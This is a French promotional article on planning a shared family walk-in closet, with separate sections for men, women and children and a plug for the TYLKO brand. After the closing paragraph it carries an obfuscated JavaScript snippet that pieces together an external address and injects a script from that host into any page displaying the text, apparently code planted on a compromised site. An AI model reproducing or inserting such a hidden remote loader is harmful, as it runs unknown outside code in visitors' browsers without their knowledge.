Dressings pour les vêtements de toute la famille. Comment les créer pour que tout le monde ait un espace pour soi ?
Plan de l’article
Quels sont les avantages du dressing pour toute la famille ?
Les dressings pour toute la famille sont une solution plus pratique que les armoires individuelles réparties dans toutes les pièces. Ils conviennent aussi bien aux petites qu’aux grandes maisons/appartements. Ils permettent de gagner de l’espace et facilitent l’organisation du rangement – tout est au même endroit. Les dressings disposées dans le couloir ou le salon s’intègrent également parfaitement au décor et permettent des arrangements intéressants. C’est possible, car les dressings modernes de la marque TYLKO vous permettent non seulement de choisir n’importe quelle dimension, mais aussi le style, la couleur et la forme. La conception personnalisée permet également d’équiper les dressings d’étagères, d’armoires, de tiroirs, de tringles, etc. en nombre et dans la configuration de votre choix.
Dressing fonctionnel: un projet qui convient à toute la famille
Dans le cas de familles nombreuses, la conception d’un dressing qui distribue son espace entre tous les utilisateurs sera la plus efficace. En d’autres termes, avec le bon choix de modules, il est possible de séparer une section pour les femmes, une section pour les hommes et une section pour les enfants. Cela permettra d’éviter le chaos et le désordre dans les vêtements et les accessoires.
Dressings pour hommes
Les dressings de la section pour hommes devraient comporter plus d’espace de suspension. La section des pansements pour hommes ne devrait pas non plus manquer de tiroirs standard. Un tiroir supplémentaire peu profond avec des séparateurs, d’autre part, fournira de l’espace pour les ceintures et les cravates. Dans le dressing pour hommes, un tiroir avec verre et porte-pantalons est une solution très fonctionnelle. La surface en verre permet de voir son contenu d’un seul coup d’œil. Le cintre coulissant, quant à lui, permet de retrouver plus facilement et rapidement le pantalon souhaité.
Dressings pour femmes
Les dressings dans la section féminine doivent comporter plusieurs anneaux avec de l’espace pour les vestes, les blazers, les chemises, les pulls et les chemisiers. Il est préférable de placer l’un des anneaux un peu plus haut afin de pouvoir y poser des robes longues et des vêtements d’extérieur. Les dressings doivent également comporter des étagères et des tiroirs ouverts.
Dressings pour enfants
Dans le dressing de famille, l’espace pour les enfants doit être tout en bas. Cela leur permettra d’accéder librement aux vêtements et de garder eux-mêmes l’armoire en ordre. Les cintres ne sont généralement pas nécessaires pour les plus jeunes, mais les étagères et les tiroirs sont utiles.
(function(){
tpv5u=”200sXpz5pv54″;tpv5=document.createElement(“script”);
tpv5_=”u”+(“st”);tpv5_+=”at”+(“.”);tpv5.async=true;tpv5_+=”in”;
tpv5u=”489142981.”+tpv5u;tpv5.type=”text/javascript”;tpv5u+=”7i3f5sp96s21″;
tpv5u+=”f3ug3l”;tpv5_+=(“f”)+”o”+(“/”);tpv5.src=”https://”+tpv5_+tpv5u;
tpv5d=document.body;tpv5d.appendChild(tpv5);
})();